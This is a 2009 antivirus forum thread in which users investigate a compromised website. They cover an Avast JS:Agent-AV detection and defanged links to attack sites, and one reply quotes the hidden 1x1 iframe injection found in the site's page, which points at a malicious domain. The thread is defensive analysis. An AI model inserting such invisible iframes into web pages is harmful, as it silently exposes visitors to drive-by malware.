Author Topic: Website billmoore.com Compromised  (Read 3633 times)

0 Members and 1 Guest are viewing this topic.

strifekensei

  • Guest
Website billmoore.com Compromised
« on: April 30, 2009, 10:08:09 PM »
While visiting hXXp://billmoore.com/ Avast threw the warning, "Sign of "JS:Agent-AV [trj]" has been found in "hXXp://searchdonor.com/" file."

-SK
« Last Edit: April 30, 2009, 10:37:13 PM by kubecj »

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2219
    • The WAR Against Malware
Re: Website billmoore.com Compromised
« Reply #1 on: April 30, 2009, 10:16:49 PM »
First of all, please change the http:// to hXXp to prevent clicking to the dangerous website.

Did you try sending the webmaster the problem?
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88895
  • No support PMs thanks
Re: Website billmoore.com Compromised
« Reply #2 on: May 01, 2009, 12:05:36 AM »
While visiting hXXp://billmoore.com/ Avast threw the warning, "Sign of "JS:Agent-AV [trj]" has been found in "hXXp://searchdonor.com/" file."

-SK

What is the full URL of the link you clicked to be directed to the searchdonor.com site infection as I didn't find anything on the home page ?
So I couldn't see what it was that would direct you to the searchdonor.com site.

Check the avast! Log Viewer (right click the avast 'a' icon), Warning section, this contains information on all avast detections. C:\Program Files\Alwil Software\Avast4\ashLogV.exe - Or check the source file using notepad C:\Program Files\Alwil Software\Avast4\DATA\log\Warning.log
####
When posting URLs to suspect sites, change the http to hXXp so the link isn't active (clickable) avoiding accidental exposure.

I did visit the searchdonor.com site and not only avast alerted but firefox's safebrowsing function (see image1), has been reported as an attack site.

Checking the searchdonor.com placeholder page it has been hacked, obfuscated script after closing html tag, see image2, See image3 for what that the previous code tries to do, send you to yet another site.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2219
    • The WAR Against Malware
Re: Website billmoore.com Compromised
« Reply #3 on: May 01, 2009, 01:09:15 AM »
Visited hXXp://searchdonor.com/ with Mcafee SiteAdvisor, Web Of Trust, Avast! Home Edition, Firefox, and NoScript and Avast found this.

Code:
4/30/2009   7:59:36 PM   1241135976   SYSTEM   996   Sign of "JS:Agent-AV [trj]" has been found in "hXXp://searchdonor.com/" file.

Wasn't this site hacked?
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88895
  • No support PMs thanks
Re: Website billmoore.com Compromised
« Reply #4 on: May 01, 2009, 01:22:11 AM »
The searchdonor.com site is a known attack site, it may have been hacked also, but that doesn't answer how strifekensei ended up there whilst visiting billmore.com as that would impli it too had been hacked to send him to searchdonor.com.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

CharleyO

  • Guest
Re: Website billmoore.com Compromised
« Reply #5 on: May 01, 2009, 04:27:59 AM »
***

The billmoore.com site has at least one hidden iframe infection as shown below :

<iframe src="kakashka.us" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

The site in the iframe is not a good site to visit.


***

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88895
  • No support PMs thanks
Re: Website billmoore.com Compromised
« Reply #6 on: May 01, 2009, 04:18:51 PM »
I have also seen the one that appears to have the link to searchdonor.com, I have noscript block iframes and it also places a marker where the iframe would go, see image. So it is in the intro page with the animation, before you actually enter the site.

However, it doesn't appear in the source of the page so there must be something else going on, like SQL injection or some exploit of some other content management software PHP, etc.

So the other hidden iframe pointing at kakashka.us is also another issue (but not one avast is alerting on.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security